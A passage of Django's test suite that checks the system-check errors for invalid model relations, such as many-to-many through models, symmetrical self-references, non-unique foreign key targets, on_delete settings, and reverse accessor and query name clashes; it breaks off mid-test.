members = models.ManyToManyField('Person', through='MissingM2MModel')
self.assertEqual(Group.check(), [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=Group._meta.get_field('members'),
id='fields.E331',
),
])
@isolate_apps('invalid_models_tests')
def test_many_to_many_through_isolate_apps_model(self):
"""
#25723 - Through model registration lookup should be run against the
field's model registry.
"""
class GroupMember(models.Model):
person = models.ForeignKey('Person', models.CASCADE)
group = models.ForeignKey('Group', models.CASCADE)
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='GroupMember')
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [])
def test_symmetrical_self_referential_field(self):
class Person(models.Model):
# Implicit symmetrical=False.
friends = models.ManyToManyField('self', through="Relationship")
class Relationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
'Many-to-many fields with intermediate tables must not be symmetrical.',
obj=field,
id='fields.E332',
),
]
self.assertEqual(errors, expected)
def test_too_many_foreign_keys_in_self_referential_model(self):
class Person(models.Model):
friends = models.ManyToManyField('self', through="InvalidRelationship", symmetrical=False)
class InvalidRelationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set_2")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set_2")
third = models.ForeignKey(Person, models.CASCADE, related_name="too_many_by_far")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Person.friends', but it has more than two "
"foreign keys to 'Person', which is ambiguous. You must specify "
"which two foreign keys Django should use via the through_fields "
"keyword argument.",
hint='Use through_fields to specify which two foreign keys Django should use.',
obj=InvalidRelationship,
id='fields.E333',
),
]
self.assertEqual(errors, expected)
def test_symmetric_self_reference_with_intermediate_table(self):
class Person(models.Model):
# Explicit symmetrical=True.
friends = models.ManyToManyField('self', through="Relationship", symmetrical=True)
class Relationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
'Many-to-many fields with intermediate tables must not be symmetrical.',
obj=field,
id='fields.E332',
),
]
self.assertEqual(errors, expected)
def test_symmetric_self_reference_with_intermediate_table_and_through_fields(self):
"""
Using through_fields in a m2m with an intermediate model shouldn't
mask its incompatibility with symmetry.
"""
class Person(models.Model):
# Explicit symmetrical=True.
friends = models.ManyToManyField(
'self',
symmetrical=True,
through="Relationship",
through_fields=('first', 'second'),
)
class Relationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set")
referee = models.ForeignKey(Person, models.CASCADE, related_name="referred")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
'Many-to-many fields with intermediate tables must not be symmetrical.',
obj=field,
id='fields.E332',
),
]
self.assertEqual(errors, expected)
def test_foreign_key_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_foreign_key = models.ForeignKey('AbstractModel', models.CASCADE)
rel_class_foreign_key = models.ForeignKey(AbstractModel, models.CASCADE)
fields = [
Model._meta.get_field('rel_string_foreign_key'),
Model._meta.get_field('rel_class_foreign_key'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
errors = field.check()
self.assertEqual(errors, [expected_error])
def test_m2m_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_m2m = models.ManyToManyField('AbstractModel')
rel_class_m2m = models.ManyToManyField(AbstractModel)
fields = [
Model._meta.get_field('rel_string_m2m'),
Model._meta.get_field('rel_class_m2m'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
errors = field.check(from_model=Model)
self.assertEqual(errors, [expected_error])
def test_unique_m2m(self):
class Person(models.Model):
name = models.CharField(max_length=5)
class Group(models.Model):
members = models.ManyToManyField('Person', unique=True)
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
'ManyToManyFields cannot be unique.',
obj=field,
id='fields.E330',
),
]
self.assertEqual(errors, expected)
def test_foreign_key_to_non_unique_field(self):
class Target(models.Model):
bad = models.IntegerField() # No unique=True
class Model(models.Model):
foreign_key = models.ForeignKey('Target', models.CASCADE, to_field='bad')
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
]
self.assertEqual(errors, expected)
def test_foreign_key_to_non_unique_field_under_explicit_model(self):
class Target(models.Model):
bad = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, to_field='bad')
field = Model._meta.get_field('field')
errors = field.check()
expected = [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
]
self.assertEqual(errors, expected)
def test_foreign_object_to_non_unique_fields(self):
class Person(models.Model):
# Note that both fields are not unique.
country_id = models.IntegerField()
city_id = models.IntegerField()
class MMembership(models.Model):
person_country_id = models.IntegerField()
person_city_id = models.IntegerField()
person = models.ForeignObject(
Person,
on_delete=models.CASCADE,
from_fields=['person_country_id', 'person_city_id'],
to_fields=['country_id', 'city_id'],
)
field = MMembership._meta.get_field('person')
errors = field.check()
expected = [
Error(
"No subset of the fields 'country_id', 'city_id' on model 'Person' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
)
]
self.assertEqual(errors, expected)
def test_on_delete_set_null_on_non_nullable_field(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_NULL)
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
'Field specifies on_delete=SET_NULL, but cannot be null.',
hint='Set null=True argument on the field, or change the on_delete rule.',
obj=field,
id='fields.E320',
),
]
self.assertEqual(errors, expected)
def test_on_delete_set_default_without_default_value(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_DEFAULT)
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
'Field specifies on_delete=SET_DEFAULT, but has no default value.',
hint='Set a default value, or change the on_delete rule.',
obj=field,
id='fields.E321',
),
]
self.assertEqual(errors, expected)
@skipIfDBFeature('interprets_empty_strings_as_nulls')
def test_nullable_primary_key(self):
class Model(models.Model):
field = models.IntegerField(primary_key=True, null=True)
field = Model._meta.get_field('field')
errors = field.check()
expected = [
Error(
'Primary keys must not have null=True.',
hint='Set null=False on the field, or remove primary_key=True argument.',
obj=field,
id='fields.E007',
),
]
self.assertEqual(errors, expected)
def test_not_swapped_model(self):
class SwappableModel(models.Model):
# A model that can be, but isn't swapped out. References to this
# model should *not* raise any validation error.
class Meta:
swappable = 'TEST_SWAPPABLE_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappableModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappableModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappableModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappableModel',
related_name='implicit_m2m',
)
explicit_fk = Model._meta.get_field('explicit_fk')
self.assertEqual(explicit_fk.check(), [])
implicit_fk = Model._meta.get_field('implicit_fk')
self.assertEqual(implicit_fk.check(), [])
explicit_m2m = Model._meta.get_field('explicit_m2m')
self.assertEqual(explicit_m2m.check(from_model=Model), [])
implicit_m2m = Model._meta.get_field('implicit_m2m')
self.assertEqual(implicit_m2m.check(from_model=Model), [])
@override_settings(TEST_SWAPPED_MODEL='invalid_models_tests.Replacement')
def test_referencing_to_swapped_model(self):
class Replacement(models.Model):
pass
class SwappedModel(models.Model):
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappedModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappedModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappedModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappedModel',
related_name='implicit_m2m',
)
fields = [
Model._meta.get_field('explicit_fk'),
Model._meta.get_field('implicit_fk'),
Model._meta.get_field('explicit_m2m'),
Model._meta.get_field('implicit_m2m'),
]
expected_error = Error(
("Field defines a relation with the model "
"'invalid_models_tests.SwappedModel', which has been swapped out."),
hint="Update the relation to point at 'settings.TEST_SWAPPED_MODEL'.",
id='fields.E301',
)
for field in fields:
expected_error.obj = field
errors = field.check(from_model=Model)
self.assertEqual(errors, [expected_error])
def test_related_field_has_invalid_related_name(self):
digit = 0
illegal_non_alphanumeric = '!'
whitespace = '\t'
invalid_related_names = [
'%s_begins_with_digit' % digit,
'%s_begins_with_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'%s_begins_with_whitespace' % whitespace,
'contains_%s_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'contains_%s_whitespace' % whitespace,
'ends_with_with_illegal_non_alphanumeric_%s' % illegal_non_alphanumeric,
'ends_with_whitespace_%s' % whitespace,
'with', # a Python keyword
'related_name\n',
'',
',', # non-ASCII
]
class Parent(models.Model):
pass
for invalid_related_name in invalid_related_names:
Child = type('Child%s' % invalid_related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=invalid_related_name),
'__module__': Parent.__module__,
})
field = Child._meta.get_field('parent')
errors = Child.check()
expected = [
Error(
"The name '%s' is invalid related_name for field Child%s.parent"
% (invalid_related_name, invalid_related_name),
hint="Related name must be a valid Python identifier or end with a '+'",
obj=field,
id='fields.E306',
),
]
self.assertEqual(errors, expected)
def test_related_field_has_valid_related_name(self):
lowercase = 'a'
uppercase = 'A'
digit = 0
related_names = [
'%s_starts_with_lowercase' % lowercase,
'%s_tarts_with_uppercase' % uppercase,
'_starts_with_underscore',
'contains_%s_digit' % digit,
'ends_with_plus+',
'_+',
'+',
'試',
'試驗+',
]
class Parent(models.Model):
pass
for related_name in related_names:
Child = type('Child%s' % related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=related_name),
'__module__': Parent.__module__,
})
errors = Child.check()
self.assertFalse(errors)
def test_to_fields_exist(self):
class Parent(models.Model):
pass
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
expected = [
Error(
"The to_field 'a' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
Error(
"The to_field 'b' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
]
self.assertEqual(field.check(), expected)
def test_to_fields_not_checked_if_related_model_doesnt_exist(self):
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
'invalid_models_tests.Parent',
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(), [
Error(
"Field defines a relation with model 'invalid_models_tests.Parent', "
"which is either not installed, or is abstract.",
id='fields.E300',
obj=field,
),
])
def test_invalid_related_query_name(self):
class Target(models.Model):
pass
class Model(models.Model):
first = models.ForeignKey(Target, models.CASCADE, related_name='contains__double')
second = models.ForeignKey(Target, models.CASCADE, related_query_name='ends_underscore_')
self.assertEqual(Model.check(), [
Error(
"Reverse query name 'contains__double' must not contain '__'.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('first'),
id='fields.E309',
),
Error(
"Reverse query name 'ends_underscore_' must not end with an "
"underscore.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('second'),
id='fields.E308',
),
])
@isolate_apps('invalid_models_tests')
class AccessorClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_accessor_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model_set = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.model_set'.",
hint=("Rename field 'Target.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.rel'."),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
]
self.assertEqual(errors, expected)
def test_clash_between_accessors(self):
class Target(models.Model):
pass
class Model(models.Model):
foreign = models.ForeignKey(Target, models.CASCADE)
m2m = models.ManyToManyField(Target)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.foreign' clashes with reverse accessor for 'Model.m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.foreign' or 'Model.m2m'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.m2m' clashes with reverse accessor for 'Model.foreign'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.m2m' or 'Model.foreign'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E304',
),
]
self.assertEqual(errors, expected)
def test_m2m_to_m2m_with_inheritance(self):
""" Ref #22047. """
class Target(models.Model):
pass
class Model(models.Model):
children = models.ManyToManyField('Child', related_name="m2m_clash", related_query_name="no_clash")
class Parent(models.Model):
m2m_clash = models.ManyToManyField('Target')
class Child(Parent):
pass
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.children' clashes with field name 'Child.m2m_clash'.",
hint=(
"Rename field 'Child.m2m_clash', or add/change a related_name "
"argument to the definition for field 'Model.children'."
),
obj=Model._meta.get_field('children'),
id='fields.E302',
)
]
self.assertEqual(errors, expected)
def test_no_clash_for_hidden_related_name(self):
class Stub(models.Model):
pass
class ManyToManyRel(models.Model):
thing1 = models.ManyToManyField(Stub, related_name='+')
thing2 = models.ManyToManyField(Stub, related_name='+')
class FKRel(models.Model):
thing1 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
thing2 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
self.assertEqual(ManyToManyRel.check(), [])
self.assertEqual(FKRel.check(), [])
@isolate_apps('invalid_models_tests')
class ReverseQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_reverse_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.model'.",
hint=(
"Rename field 'Target.model', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class ExplicitRelatedNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_m2m_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target', related_name='clash'))
def _test_explicit_related_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class ExplicitRelatedQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_integer(self, related_name=None):
self.test_fk_to_integer(related_name='+')
def test_fk_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_fk(self):
self.test_fk_to_fk(related_name='+')
def test_fk_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_m2m(self):
self.test_fk_to_m2m(related_name='+')
def test_m2m_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_integer(self):
self.test_m2m_to_integer(related_name='+')
def test_m2m_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_fk(self):
self.test_m2m_to_fk(related_name='+')
def test_m2m_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField(
'Target',
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_m2m_to_m2m(self):
self.test_m2m_to_m2m(related_name='+')
def _test_explicit_related_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class SelfReferentialM2MClashTests(SimpleTestCase):
def test_clash_between_accessors(self):
class Model(models.Model):
first_m2m = models.ManyToManyField('self', symmetrical=False)
second_m2m = models.ManyToManyField('self', symmetrical=False)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.first_m2m' clashes with reverse accessor for 'Model.second_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.first_m2m' or 'Model.second_m2m'."
),
obj=Model._meta.get_field('first_m2m'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.second_m2m' clashes with reverse accessor for 'Model.first_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.second_m2m' or 'Model.first_m2m'."
),
obj=Model._meta.get_field('second_m2m'),
id='fields.E304',
),
]
self.assertEqual(errors, expected)
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ManyToManyField("self", symmetrical=False)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change a related_name "
"argument to the definition for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
]
self.assertEqual(errors, expected)
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ManyToManyField("self", symmetrical=False)
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.IntegerField()
m2m = models.ManyToManyField("self", symmetrical=False, related_name='clash')
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.m2m'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
def test_valid_model(self):
class Model(models.Model):
first = models.ManyToManyField("self", symmetrical=False, related_name='first_accessor')
second = models.ManyToManyField("self", symmetrical=False, related_name='second_accessor')
errors = Model.check()
self.assertEqual(errors, [])
@isolate_apps('invalid_models_tests')
class SelfReferentialFKClashTests(SimpleTestCase):
def test_accessor_clash(self):
class Model(models.Model):
model_set = models.ForeignKey("Model", models.CASCADE)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.model_set' clashes with field name 'Model.model_set'.",
hint=(
"Rename field 'Model.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.model_set'."
),
obj=Model._meta.get_field('model_set'),
id='fields.E302',
),
]
self.assertEqual(errors, expected)
def test_reverse_query_name_clash(self):
class Model(models.Model):
model = models.ForeignKey("Model", models.CASCADE)
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.model' clashes with field name 'Model.model'.",
hint=(
"Rename field 'Model.model', or add/change a related_name "
"argument to the definition for field 'Model.model'."
),
obj=Model._meta.get_field('model'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
def test_clash_under_explicit_related_name(self):
class Model(models.Model):
clash = models.CharField(max_length=10)
foreign = models.ForeignKey("Model", models.CASCADE, related_name='clash')
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign' clashes with field name 'Model.clash'.",
hint=(
"Rename field 'Model.clash', or add/change a related_name "
"argument to the definition for field 'Model.foreign'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class ComplexClashTests(SimpleTestCase):
# New tests should not be included here, because this is a single,
# self-contained sanity check, not a test of everything.
def test_complex_clash(self):
class Target(models.Model):
tgt_safe = models.CharField(max_length=10)
clash = models.CharField(max_length=10)
model = models.CharField(max_length=10)
clash1_set = models.CharField(max_length=10)
class Model(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target, models.CASCADE, related_name='id')
foreign_2 = models.ForeignKey(Target, models.CASCADE, related_name='src_safe')
m2m_1 = models.ManyToManyField(Target, related_name='id')
m2m_2 = models.ManyToManyField(Target, related_name='src_safe')
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.foreign_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.foreign_1' clashes with reverse accessor for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_1' clashes with reverse query name for 'Model.m2m_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_1' or 'Model.m2m_1'."),
obj=Model._meta.get_field('foreign_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.foreign_2' clashes with reverse accessor for 'Model.m2m_2'.",
hint=("Add or change a related_name argument "
"to the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.foreign_2' clashes with reverse query name for 'Model.m2m_2'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.foreign_2' or 'Model.m2m_2'."),
obj=Model._meta.get_field('foreign_2'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with field name 'Target.id'.",
hint=("Rename field 'Target.id', or add/change a related_name "
"argument to the definition for field 'Model.m2m_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E303',
),
Error(
"Reverse accessor for 'Model.m2m_1' clashes with reverse accessor for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_1' clashes with reverse query name for 'Model.foreign_1'.",
hint=("Add or change a related_name argument to "
"the definition for 'Model.m2m_1' or 'Model.foreign_1'."),
obj=Model._meta.get_field('m2m_1'),
id='fields.E305',
),
Error(
"Reverse accessor for 'Model.m2m_2' clashes with reverse accessor for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E304',
),
Error(
"Reverse query name for 'Model.m2m_2' clashes with reverse query name for 'Model.foreign_2'.",
hint=("Add or change a related_name argument to the definition "
"for 'Model.m2m_2' or 'Model.foreign_2'."),
obj=Model._meta.get_field('m2m_2'),
id='fields.E305',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class M2mThroughFieldsTests(SimpleTestCase):
def test_m2m_field_argument_validation(self):
"""
ManyToManyField accepts the ``through_fields`` kwarg
only if an intermediary table is specified.
"""
class Fan(models.Model):
pass
with self.assertRaisesMessage(ValueError, 'Cannot specify through_fields without a through model'):
models.ManyToManyField(Fan, through_fields=('f1', 'f2'))
def test_invalid_order(self):
"""
Mixing up the order of link fields to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(Fan, through='Invitation', through_fields=('invitee', 'event'))
class Invitation(models.Model):
event = models.ForeignKey(Event, models.CASCADE)
invitee = models.ForeignKey(Fan, models.CASCADE)
inviter = models.ForeignKey(Fan, models.CASCADE, related_name='+')
field = Event._meta.get_field('invitees')
errors = field.check(from_model=Event)
expected = [
Error(
"'Invitation.invitee' is not a foreign key to 'Event'.",
hint="Did you mean one of the following foreign keys to 'Event': event?",
obj=field,
id='fields.E339',
),
Error(
"'Invitation.event' is not a foreign key to 'Fan'.",
hint="Did you mean one of the following foreign keys to 'Fan': invitee, inviter?",
obj=field,
id='fields.E339',
),
]
self.assertEqual(expected, errors)
def test_invalid_field(self):
"""
Providing invalid field names to ManyToManyField.through_fields
triggers validation errors.
"""
class Fan(models.Model):
pass
class Event(models.Model):
invitees = models.ManyToManyField(
Fan,
through='Invitation',
